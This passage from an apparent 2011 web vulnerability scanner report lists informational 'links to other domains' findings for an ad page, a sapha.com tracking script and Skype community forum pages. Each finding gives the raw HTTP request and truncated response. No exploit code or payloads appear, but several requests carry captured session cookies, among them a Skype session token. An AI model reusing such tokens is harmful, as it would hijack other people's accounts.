User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8d42e8eb29189510a0d485bae

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:53 GMT
Vary: Accept-Encoding
Content-Length: 2656
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><iframe src="http://view.atdmt.com/CNT/iview/334305255/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
A8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3Dhttp://clk.atdmt.com/CNT/go/334305255/direct/01/1315189853" target="_blank"><img border="0" src="http://view.atdmt.com/CNT/view/334305255/direct/01/1315189853" /></a></noscript></iframe><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110904223053&cmxid=2101.020016144100975458xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

17.18. http://apps.sapha.com/appshandler.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /appshandler.php?ac=2522&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 20399
Connection: close
Content-Type: application/x-javascript

var lastpageview_ID='1038376';var lastvisit_ID='214589';var lastvisitor_ID='149788';var lastvisit_datetime='2011-09-04 10:18:45';function loadDomUtils(){if(document.getElementsByClassName==undefined){
...[SNIP]...
prop in P){if(prop=="version"){Q.codebase=L+"download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version="+P.version}Q[prop]=P[prop]}}else{return'This content requires the Adobe Flash Player. <a href="http://www.adobe.com/go/getflash/" target="_blank">Get Flash</a>
...[SNIP]...

17.19. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 174747
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</link>    
       
           
       <link href="http://skypec.i.lithium.com/skins/HEAD/170EBA33ED381EA1B9A6C00931184AB7/skype1307366537.css" rel="stylesheet" type="text/css"></link>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>

<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>

<!-- Icon -->
<link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
<link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
<link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

<!-- CSS for the Skype forum header -->
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_12" href="/t5/Welcome-Getting-Started/bd-p/Welcome"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_16" href="/t5/Call-quality/bd-p/Call_quality"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_0" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_19" href="/t5/Video/bd-p/Video"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_1" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_22" href="/t5/Payments-and-Billing/bd-p/Payments_billing"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_2" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_26" href="/t5/Windows/bd-p/Windows"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_3" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_29" href="/t5/Mac/bd-p/Mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_4" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_32" href="/t5/Linux/bd-p/Linux"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_5" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_36" href="/t5/Android/bd-p/Android"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_6" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_39" href="/t5/iPhone/bd-p/iPhone"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_7" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_42" href="/t5/iPad/bd-p/iPad"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_8" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_45" href="/t5/Symbian/bd-p/Symbian"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_9" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_48" href="/t5/Other-devices/bd-p/Mobile_other"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_10" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_52" href="/t5/Payments-and-Billing/bd-p/Payments_and_Billing"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_11" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_55" href="/t5/Subscriptions/bd-p/Subscriptions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_12" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_58" href="/t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_13" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_62" href="/t5/Video/bd-p/Video_discussion"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_14" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_65" href="/t5/Hardware/bd-p/Hardware"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_15" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_68" href="/t5/Coffee-Corner/bd-p/Coffee_corner"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_16" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_71" href="/t5/Language-learning/bd-p/Languages"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_17" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_75" href="/t5/Skype-To-Go/bd-p/Skype_To_Go"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_18" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_78" href="/t5/Skype-WiFi/bd-p/Skype_Access"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_19" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_81" href="/t5/Toolbars/bd-p/Toolbars"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_20" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_84" href="/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_21" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_88" href="/t5/Skype-Connect/bd-p/Skype_Connect"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_22" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_91" href="/t5/Skype-Manager/bd-p/Skype_Manager"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_23" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_95" href="/t5/Public-API/bd-p/Public_API"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_24" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_98" href="/t5/Garage/bd-p/Garage"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_25" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_101" href="/t5/Skype-5-3-Beta-for-Mac/bd-p/mac53"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_26" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
</h2>        
       
   <img class="" title="Contains no text" alt="Message contains no text" id="display_27" src="http://skypec.i.lithium.com/skins/images/21FFD441889CDF0A530D0C80B7F5EF41/base/images/message_has_notext.png"/>
   
   
           </div>
...[SNIP]...
<a class="lia-link-navigation verified-icon" id="link_130" href="/t5/Windows/Multiple-Skype-Accounts/m-p/134282#M14570"><img class="" title="Solved!" alt="Solved!" id="display_28" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/></a>
...[SNIP]...
</h2>        
       
   
   <img class="" title="Contains a hyperlink" alt="Message contains a hyperlink" id="display_29" src="http://skypec.i.lithium.com/skins/images/7D583AE19CE6D8C6CC84B9FA3A1F76F9/base/images/message_has_url.png"/>
   
   
       </div>
...[SNIP]...
<a class="lia-link-navigation verified-icon" id="link_164" href="/t5/Windows/Multiple-Skype-Accounts/m-p/134286#M14571"><img class="" title="Solution" alt="Solution" id="display_30" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_169" href="/t5/Windows/bd-p/Windows"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_31" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_173" href="/t5/Welcome-Getting-Started/bd-p/Welcome"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_32" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_177" href="/t5/Payments-and-Billing/bd-p/Payments_billing"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_33" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_181" href="/t5/Language-learning/bd-p/Languages"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_34" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_185" href="/t5/Subscriptions/bd-p/Subscriptions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_35" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_189" href="/t5/Mac/bd-p/Mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_36" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_193" href="/t5/Payments-and-Billing/bd-p/Payments_and_Billing"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_37" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_197" href="/t5/Android/bd-p/Android"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_38" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_201" href="/t5/Call-quality/bd-p/Call_quality"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_39" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_205" href="/t5/Video/bd-p/Video"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_40" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_132365c7b16" href="#"><img class="" id="display_132365c7b16" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<span class="UserName lia-user-name">
               
       <img class="lia-user-rank-icon-left" title="Community Manager" alt="Community Manager" id="display_43" src="http://skypec.i.lithium.com/html/rank_icons/icon_role_skype_small.gif"/>    
       
           <a class="lia-link-navigation lia-page-link lia-user-name-link" style="color:#FF0000" target="_self" id="link_224" href="/t5/user/viewprofilepage/user-id/8">
...[SNIP]...
</a>
       
       
       <img class="lia-user-rank-icon-right" title="Community Manager" alt="Community Manager" id="display_44" src="http://skypec.i.lithium.com/html/rank_icons/icon_role_new_admin.gif"/>
           
       
                                       </span>
...[SNIP]...
</a>
       
       
       <img class="lia-user-rank-icon-right" title="Moderator" alt="Moderator" id="display_47" src="http://skypec.i.lithium.com/html/rank_icons/icon_role_new_moderator.gif"/>
           
       
                                       </span>
...[SNIP]...
<a class="UserAvatar lia-link-navigation" target="_self" id="link_229" href="/t5/user/viewprofilepage/user-id/59914"><img class="lia-user-avatar-message" title="changis2004" alt="changis2004" id="display_48" src="http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message"/></a>
...[SNIP]...
</h2>        
       
   
   <img class="" title="Contains a hyperlink" alt="Message contains a hyperlink" id="display_49" src="http://skypec.i.lithium.com/skins/images/7D583AE19CE6D8C6CC84B9FA3A1F76F9/base/images/message_has_url.png"/>
   <img class="" title="Contains an image" alt="Message contains an image" id="display_50" src="http://skypec.i.lithium.com/skins/images/C3D20F2A59CAAA47A2D42860BB95C6C1/base/images/message_has_image.png"/>
   
       
</div>
...[SNIP]...
<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo">
   <a class="lia-link-navigation" title="Social CRM &amp; Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM &amp; Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_51" src="http://skypec.i.lithium.com/skins/images/7CE6893D65E55F411F0162C285E0145B/base/images/button_lithium_logo.png"/></a>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

17.20. http://community.skype.com/t5/forums/searchpage/tab/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 189962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...
</link>    
       
           
       <link href="http://skypec.i.lithium.com/skins/HEAD/82D791F1979E34ADC28ED5D692E4FA05/skype1446997136.css" rel="stylesheet" type="text/css"></link>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>

<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>

<!-- Icon -->
<link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
<link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
<link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

<!-- CSS for the Skype forum header -->
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_3" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle" id="link_4" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_0" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Community" id="imagedisplay" src="http://skypec.i.lithium.com/skins/images/6AB44F2C1D5933E04C0E6DF6576F2296/base/images/icon_community.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Community:skypec lia-js-data-coreNodeDisplayId-skypec lia-component-forums-widget-community-node-tree-item" id="link_6" href="/">
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_0" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:English lia-js-data-coreNodeDisplayId-English lia-component-forums-widget-community-node-tree-item" id="link_8" href="/t5/English/
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_1" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Frequently_asked lia-js-data-coreNodeDisplayId-Frequently_asked lia-component-forums-widget-community-node-tree-item" id="link_10"
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_2" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Computer lia-js-data-coreNodeDisplayId-Computer lia-component-forums-widget-community-node-tree-item" id="link_12" href="/t5/Compu
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_3" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Mobile lia-js-data-coreNodeDisplayId-Mobile lia-component-forums-widget-community-node-tree-item" id="link_14" href="/t5/Mobile/ct
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_4" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Account lia-js-data-coreNodeDisplayId-Account lia-component-forums-widget-community-node-tree-item" id="link_16" href="/t5/My-Acco
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_5" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:General_discussion lia-js-data-coreNodeDisplayId-General_discussion lia-component-forums-widget-community-node-tree-item" id="link
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_6" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Products lia-js-data-coreNodeDisplayId-Products lia-component-forums-widget-community-node-tree-item" id="link_20" href="/t5/Produ
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_7" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Business lia-js-data-coreNodeDisplayId-Business lia-component-forums-widget-community-node-tree-item" id="link_22" href="/t5/Skype
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_8" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Skype_Garage lia-js-data-coreNodeDisplayId-Skype_Garage lia-component-forums-widget-community-node-tree-item" id="link_24" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_9" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:Welcome lia-js-data-coreNodeDisplayId-Welcome lia-component-forums-widget-community-node-tree-item" id="link_25" href="/t5/Welcome-Ge
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_10" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:de lia-js-data-coreNodeDisplayId-de lia-component-forums-widget-community-node-tree-item" id="link_27" href="/t5/Deutsch/ct-p/de">
...[SNIP]...
</a>
